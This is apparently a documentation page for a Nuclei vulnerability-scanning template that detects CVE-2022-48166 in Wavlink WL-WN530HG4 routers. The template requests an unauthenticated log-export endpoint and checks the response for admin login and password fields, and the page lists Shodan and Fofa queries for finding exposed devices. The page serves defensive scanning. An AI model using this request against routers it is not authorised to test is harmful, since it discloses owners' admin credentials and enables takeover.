Wavlink WL-WN530HG4 M30HG4.V5030.201217 - Information Disclosure
ID: CVE-2022-48166
Severity: high
Author: ritikchaddha
Tags: cve,cve2022,wavlink,exposure,wn530hg4
Description
Section titled “Description”An access control issue in Wavlink WL-WN530HG4 M30HG4.V5030.201217 allows unauthenticated attackers to download configuration data and log files and obtain admin credentials.
YAML Source
Section titled “YAML Source”id: CVE-2022-48166
info: name: Wavlink WL-WN530HG4 M30HG4.V5030.201217 - Information Disclosure author: ritikchaddha severity: high description: | An access control issue in Wavlink WL-WN530HG4 M30HG4.V5030.201217 allows unauthenticated attackers to download configuration data and log files and obtain admin credentials. impact: | Successful exploitation could lead to sensitive information disclosure. reference: - https://docs.google.com/document/d/1zvbuu3Hkk3CAkojAivlUESvtHblHJNLJdpGOoNtk-Vo/edit?usp=sharing - https://github.com/strik3r0x1/Vulns/blob/main/WAVLINK%20WN530HG4.md - https://nvd.nist.gov/vuln/detail/CVE-2022-48166 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-48166 cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.201217:*:*:*:*:*:*:* metadata: max-request: 1 verified: true vendor: wavlink product: wn530hg4_firmware shodan-query: html:"WN530HG4" fofa-query: body="WN530HG4" tags: cve,cve2022,wavlink,exposure,wn530hg4
flow: http(1) && http(2)
http: - method: GET path: - "{{BaseURL}}"
matchers: - type: dsl dsl: - 'contains(body, "WN530HG4")' internal: true
- method: GET path: - "{{BaseURL}}/cgi-bin/ExportLogs.sh"
matchers: - type: dsl dsl: - 'contains_all(body, "Login=", "Password=", "WiFi_", "WAVLINK")' - 'contains_all(header, "application/octet-stream", "filename=\"")' - 'status_code == 200' condition: and# digest: 490a0046304402201c759a1820cab264a08b06c6984c2e58c1ca5163ff5bd186c750916d8d03a8fb0220318271e227f8863aaaf565f560db76f909fa745f89fd0df5b899db4312a96804:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-48166.yaml"